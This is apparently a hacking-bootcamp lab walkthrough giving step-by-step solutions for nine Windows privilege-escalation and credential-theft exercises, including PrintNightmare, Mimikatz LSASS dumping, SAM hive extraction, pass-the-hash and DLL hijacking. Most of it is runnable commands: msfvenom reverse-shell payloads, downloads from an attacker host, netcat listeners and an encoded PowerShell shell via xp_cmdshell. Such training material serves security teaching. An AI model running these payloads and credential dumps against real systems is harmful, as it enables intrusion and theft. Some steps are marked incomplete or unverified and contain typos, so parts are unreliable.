This document outlines the labs completed on 08/06/2025 during the hacking bootcamp, focusing on network reconnaissance and compromise of Windows network infrastructure. Hints for the labs.
- Lab 1: Privilege Escalation on Windows Network
- Lab 2: Print Nightmare
- Lab 3: Privilege Escalation on Windows Network (via MSSQL)
- Lab 4: Finding Credentials in Plaintext
- Lab 5: Dump LSASS Process in Windows
- Lab 6: Dump SAM Credentials from SAM and System Database
- Lab 7: Privilege Escalation via Impersonation
- Lab 8: DLL Hijacking
- Lab 9: SeBackupPrivilege Abuse
Escalate privileges on a Windows network by exploiting misconfigured permissions.
- Misconfigured Permissions: Excessive user privileges allow unauthorized access to administrative resources.
Target Windows server must be accessible with valid domain credentials.
- Setup
- Verify connectivity to the target server.
ping <SERVER_IP>
- Connect to the workstation via ssh
- Bruteforce the password for the user john using the rockyou.txt wordlist from seclists.
- Connect the to openssh server available on the windows computer.
Then password.ssh john@<TARGET_IP>
- Check for vulnerability
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If vulnerable, it will return
AlwaysInstallElevated REG_DWORD 0x1
- Exploitation
- Generate a payload on kali with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=443 -f msi -o evil.msi
- Copy the payload to the Workstation using certutil, or serving it over python server.
certutil -urlcache -f http://<ATTACKER-IP>/evil.msi evil.msi
- Start a listener on Kali
nc -nlvp <PORT> - Execute the payload (evil.msi)
./evil.msion the windows machine and catch the shell. Find the flag in the desktop directory of the user Michael.
Misconfigured permissions grant low-privileged users access to sensitive resources, enabling privilege escalation.
- TO-DO
- Ensure valid credentials are available for enumeration.
Exploit the Print Nightmare vulnerability to gain system-level access on a Windows machine.
- Print Nightmare (CVE-2021-34527): Unauthenticated remote code execution in the Windows Print Spooler service.
Target Windows machine must have Print Spooler service enabled and unpatched.
- Setup
- Verify connectivity to the target.
ping <TARGET_IP>
- Reconnaissance
- Confirm Print Spooler service is running. (optional)
nmap -p 445 --script smb-vuln-cve-2021-34527 <TARGET_IP>
- Check if the target is vulnerable with impacket
impacket-rpcdump <USER>:<PASSWORD>@<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'
- If found, then proceed to exploitation. But you could also enumerate the domain
$ impacket-smbserver share <PATH-TO-PAYLOAD> -smb2support $ impacket-lookupsid <USER>:<PASSWORD>@<TARGET_IP>
- Exploitation
- Generate a payload using msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<our-ip> LPORT=<LISTENING_PORT> -f dll -o payload.dll
- Start a netcat listener
nc -nlvp <LISTENING_PORT> - Download and use PrintNightmare exploit to execute a malicious DLL.
$ python3 CVE-2021-1675.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP> '<MALICIOUS_DLL_PATH>' $ python3 CVE-2021-1675.py DEKSTOP-NNMPL2T/User:123456@10.10.0.14 '\\\\<ATTACKER_IP>>\\share\\payload.dll' [ This is an example ]
Print Nightmare exploits a flaw in the Print Spooler service, allowing unauthenticated users to execute arbitrary code with SYSTEM privileges.
- Use Metasploit’s PrintNightmare module for automated exploitation.
- Ensure the target is unpatched (pre-July 2021).
Escalate privileges on a Windows network by exploiting MSSQL to gain a system shell.
- Weak MSSQL Credentials: Default or guessable credentials allow command execution via xp_cmdshell.
- SeImpersonate Privilege: Enables privilege escalation using SigmaPotato.
MSSQL server must be running on the target at port 1433 with weak credentials.
-
Setup
- Verify connectivity to the MSSQL server.
ping 10.10.0.46
-
Reconnaissance
- Brute-force MSSQL credentials using a wordlist.
hydra -C ~/SecLists/.../mssql-betterdefaultpasslist.txt 10.10.0.46 mssql -s 1433 -t 8 -f -
Exploitation
- Log in to MSSQL with obtained credentials (e.g., sa:Pass@123).
python3 mssqlclient.py sa:"Pass@123"@10.10.0.46- Enable and use xp_cmdshell to inject a reverse shell.
enable_xp_cmdshell RECONFIGURE
- Generate a reverse shell in revshells.com in powershell, base64 format, then start a listener
nc -nlvp<PORT>and execute in base64 encoded powershell script in the mssql server console.
xp_cmdshell powershell -e <BASE64_ENCRYPTED_REVERSE_SHELL>
- When your listener catches the shell, check for SeImpersonate privilege.
whoami /priv
- Serve SigmaPotato executable via a Python server.
python3 -m http.server 80
- Download SigmaPotato to the target’s writable Public directory.
curl http://<ATTACKER_IP>/SigmaPotato.exe -o C:\Users\Public\SigmaPotato.exe
- Start a listener on a different port in your machine and execute SigmaPotato for a reverse shell.
.\SigmaPotato.exe --revshell <ATTACKER_IP> <ATTACKER_PORT>
Weak MSSQL credentials allow command execution via xp_cmdshell, and SeImpersonate privilege enables escalation to SYSTEM using SigmaPotato.
- Use Metasploit’s MSSQL module for automated shell delivery.
- MSSQL xp_cmdshell Guide: https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
- SigmaPotato: https://github.com/tylerdotrar/SigmaPotato/releases/tag/v1.2.6
- Ensure a listener is active before triggering the reverse shell.
- Download SigmaPotato and the wordlist if not already available.
Locate and crack credentials stored on a Windows system.
- Insecure Storage: Plaintext credentials in configuration files or memory.
Target Windows machine must be accessible with user-level credentials.
- Setup
- Verify access to the target system.
net use \\<TARGET_IP>
- Connect to the workstation via RDP
xfreerdp /u:<USER> /p:<PASSWORD> /v:<WORKSTATION_IP> +clipboard +home-drive
- Reconnaissance
- Search for configuration files containing credentials. You can search directories manually too. In our case, Secret.kdb was found in C:\
findstr /si "password" C:\*.config [Example]
- Exploitation
- We need to decrypt Secret.kdp. First dump the hash with keepass2john and then crack it.
$ keepass2john Secret.kdb > hash.txt $ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt $ hashcat -O --user hash.txt -m 13400 /usr/share/wordlists/rockyou.txt.gz [ Alternative ]- When you obtain the password, connect to the database
keepassxc Secret.kdb, load it in a new database, find the flag in the field of one of the tables.
Weaked passwords can easily be cracked with various tools such as john the ripper, hashcat etc.
- TO-DO.
- Check common locations like C:\Windows and C:\Users for config files.
- Install the keypassx client if not already available.
Extract credentials by dumping the LSASS process memory on a Windows machine.
- LSASS Exposure: Unprotected LSASS process stores plaintext credentials or hashes.
Target Windows machine must be accessible with limited privileges.
-
Setup
- Connect to target via rdp.
xfreerdp3 /u:<USER> /p:'<PASSWORD>' /compression /bpp:16 /v:<WORKSTATION_IP> /wallpaper /themes /window-drag /menu-anims /fonts /compression /rfx /rfx-mode:video /w:1024 /h:768 /network:auto /dynamic-resolution /drive:home,$(pwd)/www
- Download or copy mimikatz to the target workstation.
-
Reconnaissance
- Confirm LSASS process is running.
tasklist | findstr lsass -
Exploitation
- Dump LSASS process using Mimikatz.
mimikatz.exe > "privilege:debug" mimikatz.exe > "sekurlsa::logonpasswords"
- Connect to the Administrator user with the obtained password hash
$ xfreerdp3 /u:Administrator /pth:'<OBTAINED_HASH>' /v:<WORKSTATION_IP> +clipboard +drive:kali,/home/kali/Desktop $ evil-winrm -i <WORKSTATION_IP> -u Administrator -H <OBTAINED_HASH> [Alternative]
LSASS stores credentials in memory, which Mimikatz can extract it using the debugging privileges.
- TO-DO
- Run Mimikatz with elevated privileges (e.g debug) to access LSASS.
- Install or download evil-winrm if not available.
Extract credentials from the SAM and SYSTEM registry hives on a Windows machine.
- SAM Database Exposure: Password hashes in SAM can be extracted with access.
Target Windows machine must be accessible with a user with limited permissions.
-
Setup
- Connect to the machine via xfreerdp or xfreerdp3.
xfreerdp /u:<USER> /p:'<PASSWORD>' /compression /bpp:16 /v:<WORKSTATION_IP> /wallpaper /themes /window-drag /menu-anims /fonts /compression /rfx /rfx-mode:video /w:1024 /h:768 /network:auto /dynamic-resolution /drive:home,$(pwd)/www
-
Check if vulnerable
- Verify the privileges of the user in a powershell console.
whoami /priv
- If Bypass path traversal is enabled, then it vulnerable.
-
Exploitation
- Dump the sam and system database
$ reg save HKLM\sam sam $ reg save HKLM\system system
- Copy the sam and system files to your kali machine using shared folder or updog webserver or drag and drop.
- Dump SAM and SYSTEM hives using Impacket.
impacket-secretsdump -sam <PATH_TO_SAM> -system <PATH_TO_SYSTEM> LOCAL
- You will obtain the NTLM hashes for some users including Administrator. Use psexec to obtain an admin shell with the hashes, then find the flag in the desktop.
impacket-psexec -hashes :<ADMIN_PASSWORD_HASH> Administrator@<WORKSTATION_IP>
The SAM database stores user credential hashes, which can be extracted with misconfigured user privileges for offline cracking or direct login.
- TO-DO
- Save hives to a writable directory before dumping.
Escalate privileges by exploiting token impersonation vulnerabilities.
- SeImpersonate Privilege: Allows impersonation of privileged tokens to gain SYSTEM access.
Target Windows machine must grant SeImpersonate privilege to the user.
- Setup
- Verify user privileges.
whoami /priv
- Reconnaissance
- Confirm SeImpersonate privilege is enabled.
whoami /priv | findstr SeImpersonate - Exploitation
- Use SigmaPotato to exploit SeImpersonate for a SYSTEM shell.
- Start a net cat listener on your attacking machine
nc -nlvp <LISTENING PORT> - Download SigmaPotatoe.exe into the workstation and execute the command to get a shell
.\SigmaPotatoe.exe --revshell <ATTACKER_IP> <LISTENING_PORT>
SeImpersonate allows attackers to impersonate privileged tokens, escalating to SYSTEM privileges.
- Use RoguePotato or JuicyPotatoe for similar token impersonation exploits.
- Ensure a listener is active for the reverse shell.
Escalate privileges by exploiting DLL hijacking on a Windows application. [SOLUTION IS NOT COMPLETE AT THE MOMENT: TO-DO]
- DLL Hijacking: Applications loading untrusted DLLs from writable directories.
Target Windows machine must have a vulnerable application installed.
- Setup
- Verify access to the target system.
net use \\<TARGET_IP>
- Reconnaissance
- Identify applications loading DLLs from writable paths. You will see ITHelper program that says "Pentest.dll" not found.
procmon.exe
- Exploitation
- Create a malicious Pentest.dll with a msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LISTENING_PORT> -f dll -o Pentest.dll
- Start a net cat listener in your attacking machine `nc -nlvp <LISTENING_PORT>
- Place a malicious DLL in the writable directory in C:\MyProgram.
copy Pentests.dll C:\Users\<APP_PATH>
Applications loading DLLs without full path validation execute malicious DLLs, granting attacker-controlled code execution.
- Use PowerShell to monitor DLL loading behavior.
- Use Process Monitor to identify vulnerable DLL paths.
Escalate privileges by abusing the SeBackupPrivilege to access sensitive files.
- SeBackupPrivilege: Allows users to read any file, bypassing access controls.
Target Windows machine must grant SeBackupPrivilege to the user.
- Setup
- Verify user privileges.
whoami /priv
- Find temp user credentials in the public folder and connect with them
- Reconnaissance
- Confirm SeBackupPrivilege is enabled.
whoami /priv | findstr SeBackupPrivilege - Exploitation
- Use robocopy to copy sensitive files (e.g., SAM hive).
robocopy "C:\Users\Administrator\Desktop" "C:\Users\user_temp\Desktop" flag.txt /b /nfl /ndl /COPY:DAT
- Get the flag from the Desktop of the shared directory.
- Alternatively, you can import malicious DLLS in the powershell to change the permissions with the current user (without switching accounts).
- After that, you can dump the ntlm hashes
$ reg save HKLM\sam sam $ reg save HKLM\system system
- Copy the dumps to the attacking machine via shared folder or updog server or drag and drop if available.
- Use impacket-secretsdump to obtain the password hashes for the administrator password
impacket-secretsdump -sam <PATH_TO_SAM> -system <PATH_TO_SYSTEM> LOCAL
- You will obtain the NTLM hashes for some users including Administrator. Use psexec to obtain an admin shell with the hashes, then find the flag in the desktop.
impacket-psexec -hashes :<ADMIN_PASSWORD_HASH> Administrator@<WORKSTATION_IP>
SeBackupPrivilege allows reading of restricted files, enabling access to sensitive data like SAM hives for credential extraction.
- Use diskshadow to create a shadow copy for file access [NOT VERIFIED].
- Ensure a writable directory for copied files.